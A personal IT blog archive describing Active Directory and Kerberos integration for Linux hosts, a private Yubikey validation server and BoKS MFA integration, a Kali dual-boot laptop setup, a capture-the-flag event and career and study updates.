Now it's time to put some data into DNS and Active Directory. Using the "AD Users and Computers" tool, create Computer records for all BoKS hosts. These records will not automatically include the full DNS names, as these will be filled at a later point in time. Using the DNS tool, create a forward lookup zone for your domain ( in my case) as well as a reverse lookup zone for your IP range (10.211.55.* for me). In the forward zone create A records for your Windows and your Linux hosts (the wizard can automatically create the reverse PTR records). See below screenshots for some examples.



Linux / BoKS server setup

My Linux hosts were already installed before, as part of my BoKS testing environment. All hosts run RHEL6 and BoKS 7.0. The master server has Apache and OpenLDAP running for my Yubikey testing environment.

First order of business is to ensure that the Linux hosts all use the Windows DNS server. The best way to arrange this is to ensure that /etc/sysconfig/network-scripts/ifcfg-eth0 (adjust for the relevant interface name) has entries for the DNS server and search domains. In my case it's as follows (with DNS2 being my default DNS for everything outside of my testing environment):
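A minimal sketch of the relevant ifcfg-eth0 lines; the addresses below are illustrative placeholders, not my lab's actual values:

```shell
# ifcfg-eth0 fragment (illustrative values)
DNS1=10.211.55.5          # the Windows AD/DNS server
DNS2=192.168.1.1          # fallback DNS for everything else
DOMAIN="broehaha.nl"      # DNS search domain
```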



As was said, NTP should be running to have time synchronization among all servers involved.

Your Kerberos configuration file should be adjusted to match your AD domain:

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d
 default_realm = BROEHAHA.NL
 forwardable = true

[realms]
 BROEHAHA.NL = {
  kdc =
  admin_server =
 }

[domain_realm]
 .broehaha.nl = BROEHAHA.NL


If so desired you may test the root CA certificate from the Windows server, after which the certificate may be installed:

openssl x509 -in /home/thomas/windows_ca.cer -subject -issuer -purpose
cp /home/thomas/windows_ca.cer /etc/openldap/cacerts/
cacertdir_rehash /etc/openldap/cacerts


You should be able to test basic access to AD as follows:

ldapsearch -v -x -H ldaps:// -D "CN=Administrator,CN=Users,DC=BROEHAHA,DC=NL" -b "DC=BROEHAHA,DC=NL" -W
ldapsearch -vv -Y GSSAPI -H ldap:// -b "DC=BROEHAHA,DC=NL"


Now you may join your Linux host(s) to the Windows AD domain:

kinit bokssync@BROEHAHA.NL
Password for bokssync@BROEHAHA.NL:
adjoin join -K BROEHAHA.NL Administrator@BROEHAHA.NL


If you now use "AD Users and Computers" on the Windows server, you'll notice that the fully qualified DNS name of the Linux host has been filled in. 

Basic AD connectivity has now been achieved. We'll start putting it to good use in an upcoming tutorial.


In-between assignments? What an opportunity!

2015-11-23 14:38:00

It's been two weeks now since I've left my friends and colleagues at my previous assignment. I didn't have a new gig lined up, so for now I'm "in-between assignments". Am I having a dreary time and am I scrambling for something new? Maybe surprisingly, I'm not! I've been busier than ever!

I'd argue that some downtime between jobs is an excellent opportunity! 

  1. Learn something new
  2. Meet new people
  3. Deflate


Learn something new

Now is your chance to finally get started on all those things you've been meaning to learn and study! Make sure to plan a few hours every day to spend on research and studies. This will also help you maintain your workday rhythm. 


Meet new people

Of course you're going job hunting! Putting that aside though, I've found it tremendous to also go and meet people in my business just for the heck of it. Some would call this networking, I just call it fun :)

Why not visit one of your industry's conventions, now that you have the time? Or use to find social gatherings that look interesting or beneficial. Every week there's something you could help out with or learn about.



Deflate

And you know what? Relish your downtime! Get some exercise, go for a walk, enjoy the scenery. Feeling ambitious and feeling the urge to start running? Give the famous "Couch to 5k" schedule a shot! Not thinking about work for a few hours may help you push harder when you need to!


What have I been doing?

I've spent a few days learning a new programming language (Python in my case) by signing up for Codecademy. I've also spent a few days learning about MFA tokens and on integrating those with software I'm already familiar with. And now I'm also hitting the books on Oracle and SQL. 

I've hit the Blackhat Europe convention and learned a lot of new things. I'll also be meeting with people from a big-name college and with an IT service provider. Both talks could perhaps lead to something in the future, but for now I simply want to learn about their activities.  


And after all that hard work-that's-not-actually-work? I'm deflating by taking some walks around town and by playing a game or two. I really ought to thank my employer for this great "work-cation".


Integrating FoxT BoKS ServerControl with Yubikey (MFA) authentication

2015-11-17 10:03:00

As promised, I’ve put some time into integrating the Yubikey Neo that I was gifted with Fox Technologies BoKS.  For those who are not familiar with BoKS, here’s a summary I once wrote. I’ve always enjoyed working with BoKS and I do feel that it’s a good solution to the RBAC-problems we may have with Linux and Windows servers. So when I was gifted a Yubikey last week, I couldn’t resist trying to get it to work with BoKS.

My first order of business was to set up a local, private Yubikey validation infrastructure. This was quickly followed by using an LDAP server to host both user account data and Yubikey bindings (like so). And now follows the integration with BoKS!


Yubikey and BoKS: it takes a little work

The way I see it, there are at least three possible integration solutions that we “mere mortals” may achieve. There are definitely other ways, but they require access to the BoKS sources, which we won’t get (like building a custom authenticator method that uses YKCLIENT).

  1. Adjust your software to use both Yubikey and then PAM to use BoKS.
  2. Adjust your software to use PGP/SSH keys stored on Yubikey.
  3. Adjust your software to authenticate against Kerberos, which in turn uses Yubikey OTP. BoKS allows Kerberos authentication by default.

Putting this into a perspective most of us feel comfortable with, SSH, this would lead to:

  1. Run a second SSH daemon next to the BoKS-provided SSH. This second daemon will only allow Yubikey+password MFA logins and is only accessible to a select group of people. This requires the definition of a custom access method and some PAM customizations.
  2. A solution like this, with PGP/SSH keys.
  3. Using BoKS-sshd, together with the Kerberos authentication method defined by BoKS

In my testing environment I’ve gotten solution #1 to work reliably. The next few paragraphs will describe my methods.



The following assumes that you already have:

All the changes described will need to be made on all your BoKS systems. The clients running the special SSH daemon with Yubikey support will need the PAM files as well as all the updates to the BoKS configuration files. The master and replicas will technically not need the changes you make to the SSH daemon and the PAM files, unless they will also be running the daemon. Of course, once you've gotten it all to run correctly, you'd be best off to simply incorporate all these changes into your custom BoKS installation package!


Let’s build a second daemon

BoKS provides its own fork of the OpenSSH daemon, and for good reason! They expanded upon its functionality greatly, by allowing much greater control over access and fine-grained logging. With BoKS you can easily allow someone SCP access without allowing shell access, for example. One thing FoxT did do, though, is hard-disable PAM for this custom daemon. And that makes it hard to use the pam_yubico module. So what we’ll do instead is fire up another vanilla OpenSSH daemon with custom settings.

Downside to this approach is that you lose all fine-grained control that BoKS usually provides over SSH. Upside is that you’re getting a cheap MFA solution :) Use-cases would include your high-privileged system administrators using this daemon for access (as they usually get full SSH* rights through BoKS anyway), or employees who use SSH to specifically access a command-line based application which requires MFA.

The following commands will set up the required configuration files. This list assumes that BoKS is enabled (“sysreplace replace”), because otherwise the placement of the PAM files would be slightly different.
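As a sketch of the kind of copies involved (assuming RHEL6 paths, a BoKS-enabled system, and that the vanilla OpenSSH binary is still available as /usr/sbin/sshd; adjust names and locations to your own setup):

```shell
# Give the vanilla OpenSSH daemon its own identity and config (paths assumed)
cp /usr/sbin/sshd /usr/sbin/yubikey-sshd
cp /etc/ssh/sshd_config /etc/ssh/yubikey-sshd_config
# While BoKS is enabled ("sysreplace replace"), PAM files live under /etc/opt/boksm/pam.d
cp /etc/opt/boksm/pam.d/sshd /etc/opt/boksm/pam.d/yubikey-sshd
```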

I’ve edited /etc/ssh/yubikey-sshd_config, to simply adjust the port number from “22” to “2222”. Pick a port that’s good for you. At this point, if you start “/usr/sbin/yubikey-sshd -f /etc/ssh/yubikey-sshd_config” you should have a perfectly normal SSH with Yubikey authentication running on port 2222.

You can ensure that only Yubikey users can use this SSH access by adding “AllowGroups yubikey” to the configuration file (and then adding said Posix group to the relevant users). This ensures that access doesn’t get blown open if BoKS is temporarily disabled.

Finally, we need to adjust the PAM configuration so yubikey-sshd starts using BoKS. I’ve changed the /etc/opt/boksm/pam.d/yubikey-sshd file to read as follows:

auth      required
auth      required pam_yubico.so mode=client ldap_uri=ldap:/// ldapdn= user_attr=uid yubi_attr=yubiKeyId id= key= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth      required
account   required
account   required
password  required
# pam_selinux.so close should be the first session rule
session   required pam_selinux.so close
session   required
session   required
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session   required pam_selinux.so open env_params
session   optional pam_keyinit.so force revoke


Caveat: public key authentication

Unless you are running OpenSSH 6.x as a daemon (which is NOT included with RHEL6 / CentOS 6), you must disable public key authentication in /etc/ssh/yubikey-sshd_config. Otherwise pubkey authentication will take precedence and the Yubikey will be completely bypassed.

So, edit yubikey-sshd_config to include:

PubkeyAuthentication no
Reconfiguring BoKS

The file /etc/opt/boksm/sysreplace.conf determines which configuration files get affected in which ways when BoKS security is either activated or deactivated. Change the “pamdir” line by appending “yubikey-sshd”:

file pamdir relinkdir,copyfiles,softlinkfiles /etc/pam.d $BOKS_etc/pam.d vsftpd remote login passwd rexec rlogin rsh su gdm kde kdm xdm swrole gdm-password yubikey-sshd

The file /etc/opt/boksm/bokspam.conf ties PAM identifiers into BoKS access methods. Whenever PAM sends something to BoKS, this file helps figure out which BoKS action the user is trying to perform. At the bottom of this file I have added the following line:

yubikey-sshd   YUBIKEY-SSHD:${RUSER}@${RHOST}->${HOST}, login, login_info, log_logout, timeout

The file /etc/opt/boksm/method.conf defines many important aspects of BoKS, including authentication and access “methods”. The elements defined in this file will later appear in “access routes” (BoKS lingo for rules). At the bottom of this file I have added the following, which is a modification of the existing SSH_SH method:

METHOD YUBIKEY-SSHD:  user@host->host,    -prompt, timeout, login, noroute, @-noroute, usrqual, uexist, add_fromuser

By now it’s a good idea to restart your adjusted SSH daemon and BoKS. Check the various log files (/var/log/messages, /var/opt/boksm/boks_errlog) for obvious problems.


Assigning access

My user account BoKS.MGR:thomas has userclass (BoKS-speak for “role”) “BoksAdmin”. I’ve made two changes to my account (which assumes that group “yubikey” already exists):

This leaves me as follows:

[root@master ~]# lsbks -aTl *:thomas
Username:                     BOKS.MGR:thomas
User ID:                      501
User Classes:                 BoksAdmin
Group ID:                     501
Secondary group ID's:         505 (ALL:yubikey)
Assigned authenticator(s):    ssh_pk
Assigned Access Routes via User Classes
BoksAdmin                     login:*->BOKS.MGR 00:00-00:00, 1234567
                              su:*->root@BOKS.MGR 00:00-00:00, 1234567
                              yubikey-sshd:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567
                              ssh*:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567


Proof: Pam_yubico works with pam_BoKS

The screenshot below shows two failed login attempts by user Sarah, who does have a Yubikey but who lacks the Posix group “yubikey”. Below is a successful login by user Thomas who has both a Yubikey and the required group.

yubikey BoKS ssh login failure

The screenshot below shows a successful login by myself, with the resulting BoKS audit log entry.

yubikey ssh BoKS login success


A new project: a private Yubikey server infrastructure

2015-11-14 20:48:00

I was recently gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I’d heard about Yubico’s nifty little USB device before but never really understood what the fuss was about. I’m no fan of Facebook or GMail, so instead I thought I’d see what Yubikey could do in a Unix environment!

I've been playing with the YK for two days now and I've managed to get the following working quite nicely:

I have written an extensive tutorial on how I built the above. In the near future you may expect expansions, including tie-in to LDAP as well as BoKS.


Building a local Yubikey server infrastructure

2015-11-13 23:05:00

I recently was gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I’d heard about Yubico’s nifty little USB device before but never really understood what the fuss was about. I’m no fan of Facebook or GMail, so instead I thought I’d see what Yubikey could do in a Unix environment!

In the next few paragraphs I will explain how I built the following:

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.


Yubikey infrastructure: how does it all work?

Generally speaking, any system that runs authentication based on Yubikey products will communicate with the YubiCloud, i.e. the Yubico servers. In a corporate environment this isn’t desirable, which is why Yubico have created an open source, on-premises solution consisting of two parts: ykval and ykksm.

yubikey infrastructure

Any product desiring to use YK authentication will contact the ykval server to verify that the card in question is indeed valid and used by the rightful owner. To achieve this, ykval will contact the ykksm server and attempt to perform an encryption handshake to see if the card truly matches the expected signatures.

Yubico provide open source tools and APIs that help you build YK authentication into your software. In the case of SSH (and other Unix tools), all of this can be achieved through PAM. There are many different options of authenticating your SSH sessions using a Yubikey and I’ve opted to go with the easiest: the OTP, one-time-password, method. I’m told that you can also use YK in a challenge/response method with later versions of OpenSSH. It’s also possible to actually use your YK as a substitute for your SSH/PGP keys.


Caveat: AES keys

The AES keys stored in YKKSM cannot be the ones associated with your Yubikey product when they leave the factory. Yubico no longer make these keys available to their customers. Thus, in order to run your own local Yubikey infrastructure, you will be generating your own AES keys and storing them on the Yubikey.
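Since you are generating your own keys anyway, any decent source of randomness will do. For example, a sketch using openssl (the Personalization Tool discussed further down can also generate a key for you):

```shell
# Generate a random 128-bit AES key in hex, ready to paste into the
# Yubikey Personalization Tool or the ykksm database.
openssl rand -hex 16
```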


Caveat: OpenSSH versions

My whole project revolves around using CentOS 6.7. Red Hat have made certain choices with regards to upgrading and patching of the software that’s part of RHEL and thus 6.x “only” runs OpenSSH 5.2. This means that a few key features from OpenSSH 6.2 (which are great to use YK as optional MFA) are not yet available. Right now we’re in an all-or-nothing approach :)


Caveat: SELinux and Yubikey


If we have SELinux enabled, it has been suggested that the following tweaks will be needed:



On the server(s) you will need to install the following packages through Yum: git-core httpd php mysql-server make php-curl php-pear php-mysql wget help2man mcrypt php-mcrypt epel-release. After making EPEL available, also install “pam_yubico” and “ykclient” through Yum.

On the client(s) you will only need to install both “epel-release” and “pam_yubico” (through EPEL). Installing “ykclient” is optional and can prove useful later on.

On the server(s) you will need to adjust /etc/sysconfig/iptables to open up ports 80 and 443 (https is not included in my current documentation, but is advised).


Installation of the server:

EPEL has packages available for both the ykval and the ykksm servers. However, I have chosen to install the software through their GIT repository. Pulling a GIT repo on a production server in your corporate environment might prove a challenge, but I’m sure you’ll find a way to get the files in the right place :D

First up, clone the GIT repos for ykval and ykksm:


A few tweaks are now needed:

From this point onwards, you may work your way through the vendor-provided installation guides:

  1. Install guide for YKKSM (also included in GIT)
  2. Install guide for YKVAL (also included in GIT)

More tweaks are needed once you are finished:

Restart both MySQL and Apache, to make sure all your changes take effect.


Initial testing of the infrastructure

We have now reached a point where you may run an initial test to make sure that both ykval and ykksm play nicely. First off, you may register a new client API key, for example:

$ ykval-gen-clients --urandom --notes "Client server 2"

This has registered client number 5 (“id”) with the API key “b82PeHfKWVWQxYwpEwHHOmNTO6E=”. Both of these will be needed in the PAM configuration later on. Of course you may choose to reuse the same ID and API key on all your client systems, but this doesn’t seem advisable. It’s possible to generate new id-key pairs in bulk and I’m sure that imaginative Puppet or Chef administrators will cook up a nice way of dispersing this information to their client systems.

You can run the actual test as follows. You will recognize the client ID (“5”) and the API key from before. The other long string, starting with “vvt…” is the output of my Yubikey. Simply tap it once to insert a new string. The verification error shown below indicates that this OTP has already been used before.

$ ykclient --url "" --apikey b82PeHfKWVWQxYwpEwHHOmNTO6E=
     5 vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv --debug
  validation URL:
  client id: 5
  token: vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv
  api key: b82PeHfKWVWQxYwpEwHHOmNTO6E=
Verification output (2): Yubikey OTP was replayed (REPLAYED_OTP)

For the time being you will NOT get a successful verification, as no Yubikeys have been registered yet.


Registering user keys

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.

As I mentioned before, you cannot retrieve the AES key for your Yubikey to include in the local KSM. Instead, you will be generating new keys to be used by your end-users. There are two ways to go about this:

In either case you will need the so-called Yubikey Personalization Tool, available for all major platforms. Using this tool you will either input, or generate and then store, the new key onto your Yubikey.


yubikey personalization tools


The good thing about the newer Yubico hardware products is that they have more than one “configuration slot”. By default, the factory will only fill slot 1 with the keys already registered in YubiCloud. This leaves slot 2 open for your own use. Of course, slot 1 can also be reused for your own AES key if you so desire.

It’s mostly a matter of user friendliness:

In my case I’ve generated the new key through the Personalization Tool and then inserted it into the ykksm database in the quickest and dirtiest method: through MySQL.

$ mysql
USE ykksm;
INSERT INTO yubikeys VALUES (3811938, "vvtblilljglk", "", "783c8d1f1bb5",
"ca21772e39dbecbc2e103fb7a41ee50f", "00000000", "", 1, 1);

The fields used above are as follows: `serialnr`, `publicname`, `created`, `internalname`, `aeskey`, `lockcode`, `creator`, `active`, `hardware`. The bold fields were pulled from the Personalization Tool, while the other fields were left default or filled with dummy data. (Yes, don’t worry, all of this is NOT my actual security info)
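If you have more than a handful of keys to register, the INSERT statement is easy to script. A sketch that builds the same statement from shell variables (the values are the dummy ones shown above); its output can be piped into the mysql client:

```shell
# Values as read from the Personalization Tool (dummy data, as above)
SERIAL=3811938
PUBLICNAME="vvtblilljglk"
INTERNALNAME="783c8d1f1bb5"
AESKEY="ca21772e39dbecbc2e103fb7a41ee50f"

# Emit the INSERT statement for the ykksm database
printf 'INSERT INTO yubikeys VALUES (%s, "%s", "", "%s", "%s", "00000000", "", 1, 1);\n' \
    "${SERIAL}" "${PUBLICNAME}" "${INTERNALNAME}" "${AESKEY}"
```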


Further testing, does the Yubikey work?

Now that both ykval and ykksm are working and now that we’ve registered a key, let’s see if it works! I’ve run the following commands, all of which indicate that my key does in fact work. As before, the OTP was generated by pressing the YK’s sensor.

$ wget -q -O - 'http://localhost/wsapi/decrypt?otp=vvtblilljglkkgccvhnrvtvghjvrtdnlbrugrrihhuje'
OK counter=0001 low=75e6 high=fa use=03


$ ykclient --url "" --apikey 6YphetClMU1mKme5FrblQWrFt8c=
     4 vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc --debug
validation URL:
client id: 4
token: vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc
api key: 6YphetClMU1mKme5FrblQWrFt8c=
Verification output (0): Success


Making OpenSSH use Yubikey authentication

As I’ve mentioned before, for now I’m opting to use the Yubikey device in a very simple manner: as a second authenticator factor (MFA) for my SSH logins. We will setup PAM and OpenSSH in such a way that any SSH login will first prompt for a Yubikey OTP, after which it will ask for the actual user’s password.

Create /etc/yubikey. This file maps usernames to Yubikey public names, using the following format:

thomas:vvtblilljglk          # <username>:<yubikey public name>

The great news is that Michal Ludvig has proven that you may also store this information inside LDAP, which means one less file to manage on all your client systems!

Edit /etc/pam.d/sshd and change the AUTH section to include the Yubico PAM module, as follows. In the url parameter, substitute the fully qualified hostname assigned to the ykval web server.

auth       required
auth       required pam_yubico.so mode=client authfile=/etc/yubikey id=5 key=b82PeHfKWVWQxYwpEwHHOmNTO6E= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth       include      password-auth

Finally edit /etc/ssh/sshd_config and change the following values:

PasswordAuthentication no
ChallengeResponseAuthentication yes

Restart the SSHD and you should be golden!



When it comes to either ykksm or ykval, full logging is available through Apache. If you’ve opted to use the default log locations as outlined in the respective installation guides, then you will find the following files:

[root@master apache]# ls -al /var/log/apache
-rw-r--r--   1 root root 15479 Nov 13 21:53 ykval-access.log
-rw-r--r--   1 root root 36567 Nov 13 21:53 ykval-error.log

These will contain most of the useful messages, should either VAL or KSM misbehave.


Video: registering a new key and using it




Aside from all the pages I’ve linked to so far, a few other sites stand out as having been tremendously helpful in my quest to get all of this working correctly. Many thanks go out to:


A cheap laptop as pen-testing portable: Lenovo Ideapad s21e-20 and Kali

2015-10-07 15:00:00

the Lenovo Ideapad s21e-20 Windows 8

In preparation for the recent PvIB penetration testing workshop, I was looking for a safe way to participate in the CTF. I was loath to wipe my sole computer, my Macbook Air, and I also didn't want to use my old Macbook, which is now in use as Dana's plaything. Luckily my IT Gilde buddy Mark Janssen had a great suggestion: the Lenovo Ideapad s21e-20. gave it a basic 6,0 out of 10 and I'd agree: it's a very basic laptop at a very affordable price. At €180 it gives me a wonderfully portable system (light and a good formfactor), with a decent 11.6" screen, an okay keyboard and too little storage. Storage is the biggest issue for the purposes I had in mind! The biggest annoyance is that the touchpad doesn't work under Linux without a lot of fiddling.

I wanted to retain the original Windows 8 installation on the system, while allowing it to dual-boot Kali Linux. In order to get it completely up and running, here's the process I followed. You will need a bunch of extra hardware to get it all up and running.

So here we go!

  1. Unbox and install as usual. Walk through the complete Windows setup.
  2. Feel free to plug the SDHC microSD card into the storage slot of the laptop. You won't be using it for now, but that way you won't lose it. 
  3. Under Windows Update, disable the optional update for the Windows 10 installer. You don't have enough space for Windows 10 anyway. Then run all required updates, to keep things safe.
  4. Configure Windows as desired :)
  5. Using the partitioning and formatting tool of Windows, cut your C: drive by 1.5GB. Create a new partition on the free space created thusly. 
  6. Download the Kali Linux 32-bit live CD.
  7. Get a tool like Rufus and burn the Kali ISO to the external USB drive.
  8. Restart into UEFI, by using the advanced options menu of the Windows restart. Windows key -> Power icon -> shift-click "restart" -> advanced -> UEFI.
  9. In UEFI go to the "boot" tab. Set the boot mode to "Legacy Support", boot priority to "Legacy first" and USB boot to "enabled". 
  10. Save, then plugin the Wifi dongle on the other USB port and reboot. Boot Kali from the USB drive. 
  11. Once you've booted to the desktop, you're stuck without a mouse :p Press the Windows Flag key on your keyboard to pop up the search bar. Type "install" and start the Kali installer. 
  12. The installer starts in a new window, but it will only be partially visible! You'll need to navigate using the arrow keys and you'll need to make a few good guesses. For most questions you can use the default value as provided, or confirm the required information using the Enter key.
  13. If you would like to change your Location, the bottom-most option in the list is "Other" which will allow you to select "Europe" and so on.
  14. Once you reach the "Partition disks" screen, choose "Manual".
  15. Your internal storage is /dev/mmcblk0, while the SDHC card in the slot will be /dev/mmcblk1. Ensure that the 1.5GB partition on blk0 is made into /boot as ext4. Also partition the SDHC card to have at least 20GB of / as ext4 and swap (4GB). If desired you may also create a third partition as FAT32, so you can have more scratch space to exchange files between Windows and Linux. 
  16. The bottom-most option in the partitioning screen is "save and continue". Do not mess with TAB etc. Once you're done with the partition tables, just push the down arrow until it keeps beeping and press Enter.
  17. Once asked where to install GRUB, just chuck it on the /dev/mmcblk0 MBR. This kills the Windows 8 default bootloader, but Windows will work just fine. 
  18. Finish the installation by answering the rest of the questions.
  19. Shut down the laptop, unplug the USB drive and replace it with your USB mouse. Power on the laptop and boot Kali.

The good thing is that you won't need to mess around with extra settings to actually boot from the SDHC card! On older Ideapad laptops this was a lot of hassle and required extra work to boot from SD.

Now, we're almost there!

  1. Follow these instructions to allow GRUB to boot Windows again. At the end, use the update-grub command instead of grub2-mkconfig. Use fdisk -l /dev/mmcblk0 to find which partition you need to add to 15_Windows. In my case it was hd0,1: the EFI partition. You can reboot to verify that Windows boots again. It will complain that "no operating system was found", but Windows will boot just fine!
  2. The guys at blackMORE Ops have created a nice article titled "20 Things to do after installing Kali Linux". A lot of these additions are very nice, feel free to follow them. 
  3. Follow the Debian Wiki instructions on setting up the WL drivers for the BCM43142 onboard wifi card. Reboot afterwards and unplug the USB wifi dongle before starting back into Linux. Your onboard wifi will now work!
  4. If, like me, you appreciate your night vision go ahead and install F.Lux for Linux. In my case I start it up with: xflux -l 52.4 -g 5.3 -k 2600. You can put that in a small script and include it with the startup scripts of Gnome.  
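To start xflux along with Gnome, one option is a small freedesktop autostart entry. A minimal sketch, using the coordinates from this post (the file name is just my choice):

```shell
# Hypothetical Gnome autostart entry that launches xflux at login.
# Coordinates (-l latitude, -g longitude) and color temperature (-k) as above.
mkdir -p "$HOME/.config/autostart"
cat > "$HOME/.config/autostart/xflux.desktop" <<'EOF'
[Desktop Entry]
Type=Application
Name=xflux
Exec=xflux -l 52.4 -g 5.3 -k 2600
X-GNOME-Autostart-enabled=true
EOF
```

This saves you the separate startup script; Gnome launches anything with a .desktop file in that directory at login.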

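For reference, the 15_Windows file from step 1 is just a script in /etc/grub.d/ that prints a GRUB menu entry chainloading the Windows bootloader. A rough sketch, assuming the hd0,1 partition from my machine (adjust to your own fdisk output; written to the current directory here for illustration):

```shell
# Sketch of /etc/grub.d/15_Windows: prints a chainload entry for Windows.
# "exec tail -n +3" is the usual trick that makes the script emit
# everything below line 2 verbatim when update-grub runs it.
cat > 15_Windows <<'EOF'
#!/bin/sh
exec tail -n +3 "$0"
menuentry "Windows 8" {
    insmod part_msdos
    insmod chain
    set root=(hd0,1)
    chainloader +1
}
EOF
chmod +x 15_Windows
./15_Windows    # shows the menu entry that update-grub would pick up
```

Drop the real file in /etc/grub.d/, mark it executable, and update-grub adds the entry to the boot menu.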
And there we have it! Your Ideapad s21e is now dual-booting Windows 8 and Kali Linux. Don't forget to clone the drives to a backup drive, so you won't have to redo all of these steps every time you visit a hacking event :) Just clone the backup back onto the system afterwards, to wipe your whole system (sans UEFI and USB controllers).

View or add comments (curr. 0)

PvIB Pen.Testing workshop

2015-10-07 06:32:00

The CTF site

Last night I attended PvIB's annual pen-testing event with a number of friends and colleagues. First impressions? It's time for me to enroll as member of PvIB because their work is well worth it!

In preparation for the event I had prepared a minimalistic notebook computer with a Windows 8 and Kali Linux dual-boot. Why Kali? Because it's a light-weight, cross-hardware Linux distribution that's chock-full of security tools! Just about anything I might need was pre-installed and anything else was an apt-get away. 

Traveling to the event I expected to do some networking, meeting a lot of new people by doing the rounds a bit while trying to pick up tidbits from the table coaches going around the room. Instead, I found myself engrossed in a wonderfully prepared CTF competition. In this case, we weren't running around the conference hall, trying to capture each other's flags :D The screenshot above shows how things worked:

  1. Each participant would register an account on the CTF site.
  2. Your personal dashboard showed the available challenges, each worth a number of points.
  3. Supposedly easy challenges would net you 50-100 points, while big ones would net 250, 500 or even 1000!
  4. Each challenge would result in a file or piece of text, which one needed to MD5 and then submit through the dashboard.

I had no illusions of my skillset, so I went into the evening to have fun, to learn and to meet new folks. I completely forgot to network, so instead I hung out with a great group of students from HS Leiden, all of whom ended up really high in the rankings. While I was poking around 50-200 point challenges, they were diving deeply into virtual machine images searching for hidden rootkits and other such hardcore stuff. It was great listening to their banter and their back-and-forth with the table coach, trying to figure out what the heck they were up to :)

I ended up in 49th place out of 85 participants with 625 points. That's mostly middle of the pack, while the top 16 scored over 1400 (#1 took 3100!!) and the top 32 scoring over 875. 

Challenges that I managed to tackle included:

Together with Cynthia from HSL, we also tried to figure out:

The latter was a wonderful test and we almost had it! We chased various clues from the web, using multiple steganography tools provided by Alan Eliason, as well as ImageMagick and VLC. We assumed it was a motion-JPEG image with differences between the three frames, but that wasn't it. Turns out it -was- in fact steganography, done using steghide.

Ironically the very first test proved very annoying to me, as the MD5 sum of the string I found kept being rejected. It wasn't until our coach hinted at stray trailing characters (the newline that cat passes along) that I switched from "cat $FILE | md5sum" to "echo -n $STRING | md5sum". And that's what made it work. 
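The trailing newline really does change the hash completely. A quick demonstration, with a made-up stand-in for the challenge string:

```shell
# "SECRETFLAG" is a made-up example; the real challenge string is long gone.
echo 'SECRETFLAG' > flag.txt       # echo appends a trailing newline

cat flag.txt | md5sum              # hashes "SECRETFLAG\n" -- the rejected sum
echo -n 'SECRETFLAG' | md5sum      # hashes the bare string -- the accepted sum
printf '%s' 'SECRETFLAG' | md5sum  # printf without \n agrees with echo -n
```

Two different digests for what looks like the same string: a single invisible byte is all it takes.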

To sum things up: was I doing any pen-testing? No. Did I learn new things? Absolutely! Did I have a lot of fun? Damn right! :)

View or add comments (curr. 0)

My first foray into pen-testing

2015-09-30 18:23:00

A few days ago, my buddies at IT Gilde were issued a challenge by the PvIB (Platform voor Informatie Beveiliging), a dutch platform for IT security professionals. On October 6th, PvIB is holding their annual pen-testing event and they asked us to join in the fun. I've never partaken in anything of the sorts and feel that, as long as I keep calling myself "Unix and Security consultant", I really ought to at least get introduced to the basics of the subject :)

So here we go! I'm very much looking forward to an evening full of challenges! 

The PvIB folks warn you not to have any sensitive or personal materials on the equipment you'll use during the event, so I went with Mark Janssen's recommendation and bought a cheap Lenovo S21e-20 notebook. I'll probably upgrade that thing to Windows 10 and load it up with a wad of useful tools :)

View or add comments (curr. 0)

Some hard work that I need to pull through!

2015-09-30 17:51:00

Aside from my day to day activities in the fields of Unix/Linux and security, I want to ensure that I keep up with relevant and useful skills. I believe that expanding my horizons and keeping up with tech outside of my usual activities is a very useful activity. As the proverbial "big stick" I challenged myself to achieve two professional certifications this year:

  1. Oracle Certified Associate, for Oracle 11. Many of my activities so far have touched on databases, but my current project's the first time that I've had to actually dive into them. I would like to actually know something about the stuff I'm working with, hence I'd like to achieve at least a basic set of Oracle DBA skills. 
  2. Puppet Professional. Puppet's one of the more recent techs that I feel has a huge future. As the saying goes "I want me some of that!". While I have no current need for Puppet, I am keen to soon get started on a Puppet job!

Of course, the year isn't very long anymore, so I'd better get cracking!

View or add comments (curr. 0)

Puppet Practitioner course completed

2015-06-24 20:03:00

The past few months I've been hearing more and more about Puppet, software that allows for "easy" centralized configuration management for your servers. Monday through Wednesday were spent getting familiar with the basics of the Puppet infrastructure and of how to manage basic configuration settings of your servers. It was an exhausting three days and I've learned a lot!

The course materials assumed that one would make use of the teacher's Puppet master server, while having a practice VM on their own laptop (or on the lab's PC). As I'm usually pretty "balls to the wall" about my studying, I decided that wasn't enough for me :p

Over the course of these three days I've set up a test environment using multiple VMs on my Macbook, running my own Puppet master server, two Linux client systems and a Windows 8 client system. The Windows system provided the most challenges to me as I'm not intimately familiar with the Windows OS. Still, I managed to make all of the exercises work on all three client systems! 

Many thanks to the wonderful Ger Apeldoorn for three awesome days of learning!

View or add comments (curr. 0)

First attempt at SQL exam: did not pass

2015-06-19 07:59:00

After roughly three months of studying (at night and on the train) I took a gamble: last night I sat my Oracle SQL exam, 1Z0-051. Along the way I've learned two things:

  1. The contents of the exam are rather different from (and more difficult than!) the practice exams and study materials that came with the two books I have.
  2. It's not a good idea to attempt the online exam at 23:00, after a long day of work and an evening of studying :D

I'm going to "deflate" for a few weeks before continuing my studies. I really, really want to achieve my OCA before the end of the year, so I'd better get a hurry on after that.

But first, my first three days of Puppet training! More exciting new things to learn!

View or add comments (curr. 0)

Branching out, learning about databases

2015-03-01 13:52:00

Since achieving my RHCE last November I've taken things easy: for three months I've done nothing but relaxing and gaming to wind down from the big effort. But now it's time to pick up the slack again!

